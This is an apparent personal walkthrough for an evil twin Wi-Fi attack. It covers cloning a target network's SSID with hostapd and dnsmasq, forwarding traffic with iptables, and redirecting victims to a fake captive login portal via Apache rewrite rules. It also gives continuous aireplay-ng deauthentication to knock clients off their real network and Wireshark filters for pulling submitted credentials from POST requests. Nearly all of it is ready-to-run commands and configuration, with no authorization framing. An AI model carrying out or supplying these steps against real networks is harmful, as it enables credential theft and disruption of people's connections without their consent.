Evil-Twin Attack

Basic info on Wireless can be found here. This will be a walk through on performing an Evil Twin wireless attack and Captive Portals.

An evil twin is a fake wireless access point(AP) that looks like a real one. The concept is to set up a malicious wireless network with the same SSID name as the target.

This is not required to have a WiFi Adapter that supports monitor mode, also known as packet injection. Though this will required if kicking clients off their network to connect to ours.

Hardware

I myself have and recommend these adapters:

• Alfa AWUS036ACM <-- Capable of 2.4GHz and 5GHz

• Alfa AWUS036ACHM <-- Capable of 2.4GHz and 5GHz

• Alfa AWUS036ACH <-- Capable of 2.4GHz and 5GHz (This more than likely *will* require driver installation)

• Panda Wireless PAU09 N600 <-- Capable of 2.4GHz and 5GHz

• Alfa AWUS036NEH

• Alfa AWUS036NH

• Panda Wireless PAU05

• TP-Link TL-WN722N

• Ralink USB WiFi RT5370

You can also use a device such as WiFi Pineapple. This primarily works on open networks.

First we install the prerequisites

sudo apt install -y dnsmasq and hostapd aircrack-ng

Finding target

First we find our target, I will target "Open-WiFi" in this example. we use airodump for this

sudo airodump-ng (interface) 

Kill process that may interfere

sudo airmon-ng check kill

now put the interface into monitor mode if we're deauthenticating a client.

sudo airmon-ng start (interface)

Setup AP

Create dnsmaqs.conf file

# Set the wifi interface
interface=(interface)

# Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

# Set the gateway IP address
dhcp-option=3,10.0.0.1

# Set DNS server address
dhcp-option=6,10.0.0.1

# Set Server
server=8.8.8.8

# logs
log-queries
log-dhcp

# Redirect all requests to 10.0.0.1
#address=/#/10.0.0.1

# Redirect google to 10.0.0.1
#address=/google.com/10.0.0.1
#address=/www.google.com/10.0.0.1
#address=/google.com/www.google.com.com/10.0.0.1

Note to uncomment lines. if we uncomment the #address=/#/10.0.0.1 this will let clients connect but they will not get internet access as the pound sign(#) is a wildcard for dnsmasq. So they will connect to the AP, then immediately asked to sign-in with the Evil Portal that is setup.

So instead we can redirect websites back to our Evil Portal instead.

Create hostapd.conf and fill in with target info

interface=(interface)
driver=nl80211
ssid=(Target AP)
hw_mode=g
channel=(Target channel)
macaddr_acl=0
ignore_broadcast_ssid=0

Assign the interface a gateway and netmask

sudo ifconfig (interface) up 10.0.0.1 netmask 255.255.255.0

Add the routing table

sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

Setup an easy script for IP with:

sudo iptables --flush
sudo iptables --table nat --append POSTROUTING --out-interface (internet interface) -j MASQUERADE 
sudo iptables --append FORWARD --in-interface (wireless interface) -j ACCEPT 
sudo iptables -t nat -A POSTROUTING -j MASQUERADE
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

I named mine IP-Tables.sh. Make it executable and run it

chmod +x IP-Tables.sh
sudo ./IP-Tables.sh

If you want the AP setup without using a captive portal, just run dnsmasq and hostapd

Start dnsmasq with

sudo dnsmasq -C (path/to/dnsmasq.conf)

Start hostapd with

sudo hostapd (path/to/hostapd.conf)

We can run the command with a -B at the end to push it to the background. Though if we do this, we don't see when a client connects

sudo hostapd (path/to/hostapd.conf) -B

Captive Portals

Put your captive portal files, and put them in the /var/www/html/ directory.

Example Portals here

Edit /etc/apache2/sites-enabled/000-default.conf and add the following to the end

sudo nano /etc/apache2/sites-enabled/000-default.conf

<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>

Start the web server

sudo service apache2 start

Start dnsmasq with:

sudo dnsmasq -C (path/to/dnsmasq.conf)

Start hostapd AP with:

sudo hostapd (path/to/hostapd.conf)

We can run the command with a -B at the end to push it to the background. Though if we do this, we don't see when a client connects

sudo hostapd (path/to/hostapd.conf) -B

Once we're ready, we can disconnect clients from their network to connect to ours with aireplay.

sudo aireplay-ng -0 0 -a (BSSID) (interface)

OR if we want to deauth a specific client:

sudo aireplay-ng -0 0 -a (bssid) -c (Client MAC Address) (interface)

the -0 0 will send deauth packets continuously until stopped. we can change it to -0 10 to send just 10 deauth packets.

Post connection

Once they are connected, or even before, we can start intercepting traffic with whatever tools we want, like Wireshark, tshark, tcpdump, etc. In this case I'll use wireshark on wlan0, the interface I was broadcasting from.

As the user attempts to go to any page, they are taken to a login portal, asked enter a username/password on the portal and it will be captured.

We look for HTTP Post Request , then HTML Form URL Encoded, we will see their credentials.

Wireshark to filter for packets

• dns and ip.adr=(IP) to see sites they are going to

• frame contains (word) will search for various words

• http.request.method=="POST" will show us login info.